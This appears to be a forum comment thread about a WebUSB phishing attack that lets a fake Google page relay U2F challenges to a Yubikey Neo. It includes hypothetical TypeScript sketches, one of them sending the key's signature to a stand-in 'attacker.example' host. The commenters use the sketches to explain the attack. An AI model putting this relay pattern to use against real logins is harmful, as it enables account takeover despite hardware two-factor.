> If a victim logs into a fake Google site, the phishing site passes on their username and password to the real Google login page. Then the spoofed site passes back Google's request for the user's U2F token and collects the Yubikey's unique answer, all via WebUSB. When that answer is then presented to the real Google site, the attackers gain access to the victim's account.
So basically they are somehow able to trick the yubikey neo into accepting a challenge from a different domain, by using the webusb API.
Reading further:
> The technique would only work with U2F keys that offer protocols for connecting to a browser other than the usual way U2F tokens communicate with a computer, known as the Human Interface Device or HID, which isn't vulnerable to the attack. The Yubikey Neo, for instance, can also connect via the CCID interface used by smartcard readers
> An assumption was made by Chrome that all U2F is HID, which doesn't hold for the Neo, whereas Yubico made an assumption that USB will never be accessible by web pages directly
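If I'm reading that right, the token itself never has to "accept" anything from the wrong domain; U2F tokens don't know about domains at all. The origin/appId check lives in the browser's HID U2F path, and raw CCID access over WebUSB simply routes around it. A hypothetical sketch of what the phishing page would do (aside from the vendor ID, the interface/endpoint numbers and payload are made up for illustration):

```ts
// Hypothetical sketch only; real CCID framing is more involved.
const apduFromRealSite = new Uint8Array([/* challenge relayed from the real Google login */]);

// requestDevice needs a user gesture, so in practice this sits in a click handler.
const device = await navigator.usb.requestDevice({
  filters: [{ vendorId: 0x1050 }],   // 0x1050 = Yubico
});
await device.open();
await device.claimInterface(1);      // pretend interface 1 is the Neo's CCID interface
await device.transferOut(2, apduFromRealSite);   // relay the real site's challenge as raw APDUs
const answer = await device.transferIn(2, 64);   // the key's answer goes back to the attacker
```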
So:
- Don't use a Yubikey Neo anymore
- Don't use Chrome
- Don't use U2F because Firefox doesn't support it
- Never use your yubikey because hardly anything supports it
Nonsense. It works fine on Github, Fastmail, Gandi... it doesn't work on Google because Google uses a different spec. That bug is about making Firefox compatible with the variation that Chrome/Google uses.
In this case, though, what happened is that Google implemented a different, earlier version of the spec than most everyone else. Mozilla is busy implementing that spec as well to bridge the gap.
Firefox barely supports U2F. It works on Github and Dropbox, but doesn't work on sites like Vanguard and Google. Every time I do a Firefox update I search the bug listing, and they seem to have an incomplete implementation of the spec. They're kicking the can until they fully implement the WebAuthn API and skip over dealing with whatever earlier spec they were targeting.
Speaking of which, why does Vanguard force you to still have SMS two factor available even when you add a U2F device...
Haha it's funny you put it this way, because it's actually Firefox that implements the FIDO U2F standard correctly and Chrome that doesn't. Chrome uses a low-level API to communicate with its built-in extension, and the high-level shim it provides is not 100% spec compliant.
Google did not bother to use U2F correctly on their accounts site; Github, for example, did it correctly and their 2FA works on either browser (that is, FF and Chrome).
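For anyone wondering what "doing it correctly" looks like from the site's side, this is roughly the shape of a v1.1-style FIDO U2F JS API sign call (the kind of thing Github uses); Google's accounts page used an earlier request-list form instead. Treat the exact field names here as approximate, they're from memory:

```ts
// Rough sketch of a FIDO U2F JS API (v1.1-style) sign call.
// The `u2f` object is supplied by the browser (or Chrome's built-in extension shim).
declare const u2f: {
  sign(appId: string, challenge: string, keys: object[], cb: (resp: any) => void): void;
};

const appId = "https://example.com";                                   // placeholder relying party
const challenge = "base64url-challenge-from-the-server";               // placeholder
const registeredKeys = [{ version: "U2F_V2", keyHandle: "base64url-key-handle" }];

u2f.sign(appId, challenge, registeredKeys, (resp) => {
  if (resp.errorCode) {
    console.error("U2F sign failed:", resp.errorCode);
  } else {
    // POST resp.clientData + resp.signatureData back to the server to finish login.
  }
});
```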
The usual rationale from companies forcing SMS two factor is that you need to have a convenient account-recovery mechanism before you enable something strict and lock yourself out. They don't want the support cost of dealing with these lockouts.
Unfortunately, these same companies often then claim that there is no harm in SMS two factor since "clearly it is stronger than one factor". But they are blind to their own systematic design flaw which is that the same SMS setting to enable two factor also usually enables one-factor password-recovery via this supposedly trusted phone.
Given what we know about SMS security, it is pretty obvious that one-factor SMS is weaker than a good strong one-factor password. And if the good strong password can be merrily reset by whoever hijacks your phone, you have really just decreased your security posture while performing this whole security theater around two-factor and hardware tokens.
Correct me if I am wrong, but these SMS-based login setups are only sending a message to your phone number. It's about as secure as sending an email to your email address. There is no end-to-end security between the original sender and the subscriber's phone and SIM card to ensure that the message only gets to the correct recipient.
You only need to hijack the victim's phone number so that messages are sent elsewhere. This can be done by technical or social hacks such as porting the subscriber's number to a new provider or pretending a phone was lost and having the phone company register a replacement SIM. There is no need to physically intercept the victim's phone, so it is not in fact a second factor.
> Chrome on Android using either a OTG cable for a U2F USB key
Which key did you use? I tried a Yubikey 4 (via OTG cable) and a 4C (directly) and the U2F flow with Authenticator did not work (it was as if the key was not recognized for U2F).
It's simple: allowing sandboxed code to request limited access to a USB device is more secure than having users install native, unsandboxed code with access to everything on their PC.
Not every link you click. Only sites that you grant access to the necessary attack surface. The Web USB API can't be attacked by sites that you haven't granted access to it.
As opposed to native desktop apps, which get all the same permissions by default that a web app requires a zero-day sandbox escape vulnerability to achieve?
Native desktop apps are limited in number and are nowhere near the dumpster fire the web is. My desktop isn't routinely downloading and executing payloads from the web. They're clearly different.
This is about the Web USB API, not the entire web in general. Are you routinely granting web pages access to your USB devices? That's not a permission that web apps get by default (unlike with native desktop apps btw).
It comes down to this: if you ever found yourself in a situation where you needed to connect a USB device to a remote service, would you prefer to download that service's unsandboxed native code to your PC and execute it? Or execute some JS in the browser sandbox and grant it limited access to that one specific device?
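To make the "limited access" point concrete, a minimal sketch of the model as I understand it (the vendor ID filter is just an example):

```ts
// A page starts with access to nothing. getDevices() only returns devices
// this origin has already been granted.
const alreadyGranted = await navigator.usb.getDevices();

// Getting anything new requires a user gesture plus an explicit chooser where
// the user picks one specific matching device.
document.querySelector("#connect")?.addEventListener("click", async () => {
  const device = await navigator.usb.requestDevice({
    filters: [{ vendorId: 0x2341 }],   // e.g. an Arduino board (example value)
  });
  console.log("user granted access to:", device.productName);
});
```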
Would that include the "Run" button on a downloaded executable?
While obviously we want to do as much as we can to discourage users from shooting themselves in the foot, there are limits. At some point, eventually you _do_ have to trust that the user knows what he's doing.
Giving users a choice on when to allow a page access to one specific USB device is not a "disaster".
I think WebUSB will enable a lot of cool things, though it will definitely be hard to sandbox.
I want to program an Arduino from a web IDE. I want to control a 3d printer or pen plotter from a web application. I want to store things on a flash drive on my iPhone using a web-based file explorer? This last one sounds strange.
On a tangent, I see application runtimes moving into the browser by default, with very few performance-critical applications remaining outside that stack. Photoshop and AAA games might be exceptions. Services like databases and web servers would have no need to be in Chrome.
Just because it's possible doesn't mean we should!
I see nearly no good reason for any of those uses to be web-based, and certainly not with hardware control! If you want to store files on your flash drive, the browser should handle that, not give out direct usb access...
Hearing this exists was a shock, like when the first Android 'Instant' app showed up on my phone (apps that you don't install, but that run themselves when you go to a website or a physical store, without asking you).
Getting 400 students up and running with Python is painful enough on its own, even without USB. For projects, some small fraction of those used USB, and we again spent a pretty good chunk of time getting them all working.
I worked for an online retailer a long long time ago and this would have been nice to have at our packstations. The tech at each station consisted of a Linux desktop, a barcode scanner, a printer, and a scale. The commerce platform was web based and displayed the current weight on the scale on the pack page.
Originally the scale was connected via serial port to the desktop. A little Perl service we called "the scale daemon" exposed the current weight on some localhost port. The backend would constantly poll that service and the web browser would poll the backend to keep the value on the page up to date. It was a nifty solution albeit a bit clumsy and it meant running an extra piece of software on 50+ machines in a warehouse.
At some point our scale vendor stopped selling scales with serial connections or maybe it was that the PC vendor stopped including serial ports. It was 10+ years ago and I can't recall exactly. What I do remember is that the guy that wrote the scale daemon had moved on and I had to figure out how to make it work with USB. It was fun and probably not as hard as it seemed at the time, but wow, being able to get at that scale from inside the browser would have massively simplified things.
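For what it's worth, today that whole daemon-plus-polling chain could plausibly collapse into something like this on the pack page itself. Purely a sketch: it assumes a scale with a vendor-specific bulk endpoint and a made-up report format (plenty of real scales are HID, which WebUSB doesn't reach):

```ts
// Hypothetical: poll a USB scale straight from the pack page.
async function readWeightKg(dev: USBDevice): Promise<number> {
  const result = await dev.transferIn(1, 8);       // endpoint 1, 8-byte report (assumed)
  return result.data!.getUint16(4, true) / 1000;   // grams at offset 4 (assumed format)
}

const scale = await navigator.usb.requestDevice({ filters: [{ vendorId: 0x0922 }] }); // e.g. a Dymo scale
await scale.open();
await scale.claimInterface(0);
setInterval(async () => {
  document.querySelector("#weight")!.textContent = `${await readWeightKg(scale)} kg`;
}, 500);
```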
More importantly: "the phishing site would also have to ask the user's permission to enable WebUSB access to their Yubikey, and then tap the physical button on the key."
So don't do that. It would be nice to know exactly what this dialog looks like, but it seems low risk?
Convincing users to grant access to a USB device when they're attempting to log in to a service using said USB device sounds like something that would work more often than not. We wouldn't need phishing-resistant authentication methods if humans were good enough at making those kinds of decisions.
I have to admit that in all of my use of my Yubikey Neo in Chrome I don't recall ever being asked for permission to access the device. Firefox hasn't asked either.
I'm not saying that you need to grant any kind of permission in order to use U2F tokens, but rather that a user thinking "I want to login to Google" and "I need to use that USB key thingy to do that" is quite likely to accept a prompt that requests access to the U2F device.
Sorry, I guess what I was getting at is that in hindsight I'm surprised no browser ever explicitly asked me for access to the Yubikey or told me why it needed it; I've just blindly trusted it because of the few sites I use it with.
On the other hand, it's basically functioning as another keyboard device and not a special USB device so it shouldn't be that surprising, right? (serious question)
How about you tell users to simply not enter their password into phishing sites?
When users want to do something (sign in) and there are instructions on the page telling them to do something (enter password or accept usb) then the users will do it.
Presumably you are referring to WebAuthn[1]. I am optimistic that this will lead to better browser support, and consequently better website support. IIRC it's expected to reach Firefox stable in the May release. Hopefully the various sites that currently only support U2F in Chrome will move to this new standard.
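For reference, the WebAuthn call looks roughly like this (placeholder challenge/credential values); the important part is that the browser, not the page, binds the origin into the signed client data:

```ts
// Sketch of a WebAuthn assertion request.
const challenge = new Uint8Array(32);      // would come from the server
const credentialId = new Uint8Array(64);   // stored at registration time

const assertion = await navigator.credentials.get({
  publicKey: {
    challenge,
    allowCredentials: [{ type: "public-key", id: credentialId }],
    timeout: 60_000,
  },
});
// The response's clientDataJSON carries the real origin, filled in by the
// browser, which is what makes a phishing site's copy of it useless.
```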
I didn't even realize web USB was a thing now. I remember it being talked about, but I must have missed the HN conversation when Chrome implemented it.
So does Chrome ask for permission to allow USB access? Or maybe there's something about this I'm not getting.
There is a permission prompt, but it's fairly easy to convince users to accept it during a login attempt when they're expecting their USB U2F device to be used.
It's surprising that this works. Last time I checked WebUSB, the device would have to have a descriptor allowing its use via a web page, effectively whitelisting what can be used on the web.
While I understand the reasoning behind that move, I'm not sure I fully agree with it. I don't think users will necessarily understand the implications of granting a site access to a device that wasn't designed with attacks from malicious code as part of its threat model. At the very least, the wording on the permissions dialog should be changed to indicate that the user is granting the site _full control_ over the device they're connecting it to.
Or just don't click "Connect" on the USB access permissions prompt when it pops up.
Unfortunately though, as with any phishing attack, this flaw is most likely to be effective against uninformed users, and those users are the least likely to take proactive measures to protect themselves beforehand.
Fortunately:
> "We will have a short term mitigation in place in the upcoming version of Chrome, and we're working closely with the FIDO Alliance to develop a longer-term solution as well."
tqbf, pinboard, and zeynep are handing them out to journalists.
There is an enormous need for some solution resistant to users who aren't good at identifying legitimate vs phishing sites. U2F as it stands is the only practical and deployed solution to that problem. It's infuriating that chrome broke this security promise to compete with microsoft.
It sounds like the report glossed over a rather important bit of UX:
If, when logging in, you see a big modal dialog asking if you want to grant WebUSB access to the site, then DON'T select your Yubikey out of the list of connected USB devices and click "Allow".
As long as you can convince yourself to avoid taking that particular unusual action, it sounds like you're fine.
They're slowly inventing operating systems, complete with hypervisor technology, with all the gargantuan complexity that it implies, to please big business that wants the client OS to essentially become obsolete.
The web browsers are so much more secure than what we had before (just accepting executable binaries from other people), so I look at this as a way forward.
I'm not that confident. Browsers blindly accept and execute whatever they receive. The more features that get added, the larger surface there is to exploit. A case in point: WebUSB as mentioned in the article.
The nice thing though is that, although the added attack surface is there, it's not really accessible to web pages until a user grants the necessary permissions. Not really all that different from telling users to execute a native app in that respect.
In this case it's not even an exploit really; more like social engineering. (Tricking users into granting the phishing site unrestricted access to their Yubikey, then using that access to trick the user into authenticating a login session for the phishing site.)
A browser is more secure than a linux namespace with SELinux rules that require explicit approval for any access?
A browser is more secure than Qubes?
The flaw is in legacy software, not in what is possible. Had humanity spent the effort that was spent on browsers on operating systems instead, we'd have had the same security improvements without all the negatives.
When I see a shady link, I open it in a browser inside my virtual machine. I've had attacks on firefox that straight executed a binary on my machine, without me doing anything but clicking a link.
I'm unclear as to how this would work in practice. Chrome supports U2F out of the box, so if you got a big weird pop-up asking to access your USB device, you'd at least be suspicious.
Upon registration, the server also collects a nonce, which is used for verification[0]. The attackers would need to get that nonce from the site. Hopefully the site doesn't enable CORS, so a phishing site cannot request a challenge.
Lastly, on Linux (I know, a minority), you need to make an entry in rules.d[1] to even allow Chromium to access USB devices.
I can see how this potentially maybe could catch someone, but I don't see it as much of a risk.
Part of the problem is that, assuming you didn't know much about how U2F works, it seems pretty natural for a site to request access to your YubiKey in order to use it to authenticate you.
I'd rephrase that to something more along the lines of "example.com wants full control of". Maybe with an option for device manufacturers to opt-in to support for WebUSB, allowing for protocol enhancements to improve security and a less scary permissions prompt.
>The attackers would need to get that nonce from the site.
The attackers have their own machine with a browser running on it that visits the real site and gets the nonce, then hands that nonce to the victim to be signed by their key.
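A very rough sketch of that relay, running in the victim's browser on the phishing page (hypothetical attacker endpoints; `signWithRawUsbAccess` stands in for the WebUSB access discussed elsewhere in the thread):

```ts
// Hypothetical helper that talks to the key over WebUSB/CCID.
declare function signWithRawUsbAccess(challenge: string, keyHandle: string): Promise<string>;

// 1. The attacker's server logs in to the real site with the phished password
//    and hands the resulting U2F challenge to the victim's page.
const { challenge, keyHandle } = await fetch("https://attacker.example/challenge").then(r => r.json());

// 2. The victim's key signs it via raw USB access, with no origin check in the way.
const signature = await signWithRawUsbAccess(challenge, keyHandle);

// 3. The attacker finishes the login on their own machine using that signature.
await fetch("https://attacker.example/finish", { method: "POST", body: JSON.stringify({ signature }) });
```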
What is the usecase for WebUSB? Here [1] someone from Google suggests vendors should write device drivers in Chrome HTML and Chrome Javascript. Please don't.
Or (my assumption) it might be for devices that cannot work without a browser and a network connection.
Yeah, the great thing about WebUSB is that it can easily be used to upgrade devices to new firmware with new features. For example, suppose that some end user's USB device lacks the ability to act like a USB Rubber Ducky and inject malicious keystrokes in order to compromise their machine. WebUSB allows a clean, easy way to fix that remotely.
Next step will be devices that cannot work without Chrome, network connection and "anonymous" "telemetry" for the purpose of "improving customer experience".
A website should never have access to USB devices with just an allow prompt. Imagine taking control of a USB mouse or keyboard... You could then just take control of the machine...
I wish channel bound tokens were mandatory in the u2f spec, or a browser key was part of the auth request to the token, for exactly this reason. U2f is "optionally" unphishable.
I know a bit about token bound channels. But the u2f device only talks to Chrome via usb. So anything that the legitimate chrome could say to the u2f device (negotiating tokens, channels, etc) can now be done by the attacker via webusb. So I would think the attacker can get the u2f device's signature on the attacker's channel.
It should be just as if you unplugged your u2f device from your machine and plugged it into the attacker's machine.
I can't imagine that there would be such a writeup. Even just trying to understand the security framework of one browser is a gargantuan task.
As for Chrome being a real issue, some points off the top of my head:
- Its extension store breeds malware at regular intervals (feels like there are headlines about that at least every other month).
- Pretty bad autofill exploit that was left unfixed for years: https://github.com/anttiviljami/browser-autofill-phishing
(Might've been fixed in the past year, I haven't checked, but I doubt it.)
- Chrome Sync is not end-to-end-encrypted without the use of a second password, which effectively means that it is unencrypted for 99.9% of Chrome users. Google also actively uses this data, weaving your browsing history into the profile that they keep of you. So, if they ever have a data leak, a lot of data is going to come from people using Chrome, too. The NSA/CIA/FBI also tap into this data, possibly using it for cyber war attacks, so if you live in a country other than the USA, you're making yourself a prime target and an easy target by inputting this data through Chrome.
Well, that's ironic. Just yesterday I subscribed to a magazine that offers a Yubikey as a free gift. The magazine? Wired.
It looks like this vulnerability is limited to Chrome at the moment. Good to know if using Chrome (or even Epichrome for SSBs) when doing things like online banking.
U2F != OTP (which is what the Yubikey 4 offers). For some reason the FIDO alliance decided they didn't want OTP.
The Yubikey 4 allows OpenPGP keys as well as OTP Yubikey functionality, making it half HSM/half token. The FIDO keys offered by Yubi only do asymmetric cryptography.
Hmm. I assumed U2F does not protect you from phishing; it just adds a second layer of protection to your account, protecting you from credential theft.
The U2F anti-phishing stuff implemented by Chrome is just a neat little extra. Is this behaviour of checking the origin actually in the spec?
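As far as I can tell it is in the spec, in two places: the browser (FIDO client) checks that the appId matches the calling origin before it ever talks to the token, and the origin is also embedded in the signed client data, which the relying party can verify. A rough sketch of that server-side check (field names from memory, so treat them as approximate):

```ts
// Sketch of relying-party-side checks on a U2F sign response (Node.js).
import { createHash } from "crypto";

function checkClientData(clientDataB64: string, expectedChallenge: string, expectedOrigin: string): Buffer {
  const raw = Buffer.from(clientDataB64, "base64url");
  const clientData = JSON.parse(raw.toString("utf8"));
  if (clientData.challenge !== expectedChallenge) throw new Error("challenge mismatch");
  if (clientData.origin !== expectedOrigin) throw new Error("origin mismatch");
  // The token's signature covers sha256(appId) || flags || counter || sha256(clientData),
  // so this hash then feeds into signature verification with the registered public key.
  return createHash("sha256").update(raw).digest();
}
```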